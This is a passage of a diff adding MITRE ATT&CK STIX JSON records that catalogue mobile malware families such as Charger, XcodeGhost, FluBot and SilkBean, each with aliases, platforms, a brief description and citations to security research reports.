"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--ca4f63b9-a358-4214-bb26-8c912318cfde", + "created": "2017-10-25T14:48:44.540Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0286", + "external_id": "S0286" + }, + { + "source_name": "OBAD", + "description": "(Citation: TrendMicro-Obad)" + }, + { + "source_name": "TrendMicro-Obad", + "description": "Veo Zhang. (2013, June 13). Cybercriminals Improve Android Malware Stealth Routines with OBAD. Retrieved December 9, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Android/Chuli.A", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) is Android malware that was delivered to activist groups via a spearphishing email with an attachment. (Citation: Kaspersky-WUC)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Android/Chuli.A" + ], + "type": "malware", + "id": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "created": "2017-10-25T14:48:45.482Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0304", + "external_id": "S0304" + }, + { + "source_name": "Android/Chuli.A", + "description": "(Citation: Kaspersky-WUC)" + }, + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Charger", + "description": "[Charger](https://attack.mitre.org/software/S0323) is Android malware that steals steals contacts and SMS messages from the user's device. It can also lock the device and demand ransom payment if it receives admin permissions. (Citation: CheckPoint-Charger)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Charger" + ], + "type": "malware", + "id": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "created": "2017-10-25T14:48:39.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0323", + "external_id": "S0323" + }, + { + "source_name": "Charger", + "description": "(Citation: CheckPoint-Charger)" + }, + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-13T22:33:34.237Z", + "name": "Drinik", + "description": "[Drinik](https://attack.mitre.org/software/S1054) is an evolving Android banking trojan that was observed targeting customers of around 27 banks in India in August 2021. Initially seen as an SMS stealer in 2016, [Drinik](https://attack.mitre.org/software/S1054) resurfaced as a banking trojan with more advanced capabilities included in subsequent versions between September 2021 and August 2022.(Citation: cyble_drinik_1022)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Drinik" + ], + "type": "malware", + "id": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "created": "2023-01-18T19:05:43.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1054", + "external_id": "S1054" + }, + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Trojan-SMS.AndroidOS.OpFake.a", + "description": "[Trojan-SMS.AndroidOS.OpFake.a](https://attack.mitre.org/software/S0308) is Android malware. (Citation: Kaspersky-MobileMalware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--d89c132d-7752-4c7f-9372-954a71522985", + "created": "2017-10-25T14:48:46.734Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0308", + "external_id": "S0308" + }, + { + "source_name": "Trojan-SMS.AndroidOS.OpFake.a", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "XcodeGhost", + "description": "[XcodeGhost](https://attack.mitre.org/software/S0297) is iOS malware that infected at least 39 iOS apps in 2015 and potentially affected millions of users. (Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--d9e07aea-baad-4b68-bdca-90c77647d7f9", + "created": "2017-10-25T14:48:42.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0297", + "external_id": "S0297" + }, + { + "source_name": "XcodeGhost", + "description": "(Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)" + }, + { + "source_name": "PaloAlto-XcodeGhost1", + "description": "Claud Xiao. (2015, September 17). Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/" + }, + { + "source_name": "PaloAlto-XcodeGhost", + "description": "Claud Xiao. (2015, September 18). Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "SilkBean" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "type": "malware", + "created": "2020-12-24T21:41:36.719Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0549", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0549" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-04-19T14:29:45.809Z", + "name": "SilkBean", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) is a piece of Android surveillanceware containing comprehensive remote access tool (RAT) functionality that has been used in targeting of the Uyghur ethnic group.(Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "WolfRAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "type": "malware", + "created": "2020-07-20T13:27:33.113Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0489", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0489" + }, + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-09-11T15:58:40.564Z", + "name": "WolfRAT", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) is malware based on a leaked version of [Dendroid](https://attack.mitre.org/software/S0301) that has primarily targeted Thai users. [WolfRAT](https://attack.mitre.org/software/S0489) has most likely been operated by the now defunct organization Wolf Research.(Citation: Talos-WolfRAT) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-28T17:20:20.194Z", + "name": "BusyGasper", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) is Android spyware that has been in use since May 2016. There have been less than 10 victims, all who appear to be located in Russia, that were all infected via physical access to the device.(Citation: SecureList BusyGasper)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "BusyGasper" + ], + "type": "malware", + "id": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "created": "2021-10-01T14:42:48.234Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0655", + "external_id": "S0655" + }, + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "created": "2017-10-25T14:48:47.674Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0293", + "url": "https://attack.mitre.org/software/S0293" + }, + { + "source_name": "CheckPoint-BrainTest", + "url": "http://blog.checkpoint.com/2015/09/21/braintest-a-new-level-of-sophistication-in-mobile-malware/", + "description": "Andrey Polkovnichenko and Alon Boxiner. (2015, September 21). BrainTest – A New Level of Sophistication in Mobile Malware. Retrieved December 21, 2016." + }, + { + "source_name": "Lookout-BrainTest", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BrainTest](https://attack.mitre.org/software/S0293) is a family of Android malware. (Citation: CheckPoint-BrainTest) (Citation: Lookout-BrainTest)", + "modified": "2022-04-15T15:36:43.770Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "BrainTest", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "TERRACOTTA" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "type": "malware", + "created": "2020-12-18T20:14:46.858Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0545", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0545" + }, + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-28T18:59:32.817Z", + "name": "TERRACOTTA", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) is an ad fraud botnet that has been capable of generating over 2 billion fraudulent requests per week.(Citation: WhiteOps TERRACOTTA)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Triada" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "type": "malware", + "created": "2019-07-16T14:33:12.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0424", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0424" + }, + { + "description": "Snow, J. (2016, March 3). Triada: organized crime on Android. Retrieved July 16, 2019.", + "url": "https://www.kaspersky.com/blog/triada-trojan/11481/", + "source_name": "Kaspersky Triada March 2016" + } + ], + "modified": "2020-05-28T16:52:37.979Z", + "name": "Triada", + "description": "[Triada](https://attack.mitre.org/software/S0424) was first reported in 2016 as a second stage malware. Later versions in 2019 appeared with new techniques and as an initial downloader of other Trojan apps.(Citation: Kaspersky Triada March 2016)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Golden Cup" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "type": "malware", + "created": "2020-11-20T15:44:57.339Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0535", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0535" + }, + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-12-22T21:48:10.951Z", + "name": "Golden Cup", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) is Android spyware that has been used to target World Cup fans.(Citation: Symantec GoldenCup) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-31T23:02:48.577Z", + "name": "FluBot", + "description": "[FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "FluBot" + ], + "type": "malware", + "id": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "created": "2023-02-28T20:25:59.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1067", + "external_id": "S1067" + }, + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + }, + { + "source_name": "bitdefender_flubot_0524", + "description": "Filip TRUȚĂ, Răzvan GOSA, Adrian Mihai GOZOB. (2022, May 24). New FluBot Campaign Sweeps through Europe Targeting Android and iOS Users Alike. Retrieved February 28, 2023.", + "url": "https://www.bitdefender.com/blog/labs/new-flubot-campaign-sweeps-through-europe-targeting-android-and-ios-users-alike/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "ViperRAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "type": "malware", + "created": "2020-09-11T16:22:02.954Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0506", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0506" + }, + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-29T20:03:42.662Z", + "name": "ViperRAT", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) is sophisticated surveillanceware that has been in operation since at least 2015 and was used to target the Israeli Defense Force.(Citation: Lookout ViperRAT) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Adups", + "description": "[Adups](https://attack.mitre.org/software/S0309) is software that was pre-installed onto Android devices, including those made by BLU Products. The software was reportedly designed to help a Chinese phone manufacturer monitor user behavior, transferring sensitive data to a Chinese server. (Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "created": "2017-10-25T14:48:47.038Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0309", + "external_id": "S0309" + }, + { + "source_name": "Adups", + "description": "(Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)" + }, + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + }, + { + "source_name": "BankInfoSecurity-BackDoor", + "description": "Jeremy Kirk. (2016, November 16). Why Did Chinese Spyware Linger in U.S. Phones?. Retrieved February 6, 2017.", + "url": "http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "SimBad" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f79c01eb-2954-40d8-a819-00b342f47ce7", + "type": "malware", + "created": "2019-11-21T19:16:34.526Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0419", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0419" + }, + { + "description": "Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. Retrieved November 21, 2019.", + "url": "https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/", + "source_name": "CheckPoint SimBad 2019" + } + ], + "modified": "2020-01-27T17:01:31.634Z", + "name": "SimBad", + "description": "[SimBad](https://attack.mitre.org/software/S0419) was a strain of adware on the Google Play Store, distributed through the RXDroider Software Development Kit. The name \"SimBad\" was derived from the fact that most of the infected applications were simulator games. The adware was controlled using an instance of the open source framework Parse Server.(Citation: CheckPoint SimBad 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Android/AdDisplay.Ashas" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "type": "malware", + "created": "2020-10-29T19:19:08.848Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0525", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0525" + }, + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T19:19:08.848Z", + "name": "Android/AdDisplay.Ashas", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) is a variant of adware that has been distributed through multiple apps in the Google Play Store. (Citation: WeLiveSecurity AdDisplayAshas)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Marcher", + "description": "[Marcher](https://attack.mitre.org/software/S0317) is Android malware that is used for financial fraud. (Citation: Proofpoint-Marcher)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--f9854ba6-989d-43bf-828b-7240b8a65291", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0317", + "external_id": "S0317" + }, + { + "source_name": "Proofpoint-Marcher", + "description": "Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-29T21:11:14.364Z", + "name": "TianySpy", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) is a mobile malware primarily spread by SMS phishing between September 30 and October 12, 2021. [TianySpy](https://attack.mitre.org/software/S1056) is believed to have targeted credentials associated with membership websites of major Japanese telecommunication services.(Citation: trendmicro_tianyspy_0122) ", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "TianySpy" + ], + "type": "malware", + "id": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "created": "2023-01-19T18:05:30.924Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1056", + "external_id": "S1056" + }, + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "DressCode", + "description": "[DressCode](https://attack.mitre.org/software/S0300) is an Android malware family. (Citation: TrendMicro-DressCode)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca", + "created": "2017-10-25T14:48:37.856Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0300", + "external_id": "S0300" + }, + { + "source_name": "DressCode", + "description": "(Citation: TrendMicro-DressCode)" + }, + { + "source_name": "TrendMicro-DressCode", + "description": "Echo Duan. (2016, September 29). DressCode and its Potential Impact for Enterprises. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Gustuff" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "type": "malware", + "created": "2019-09-03T20:08:00.241Z", + "created_by_ref": 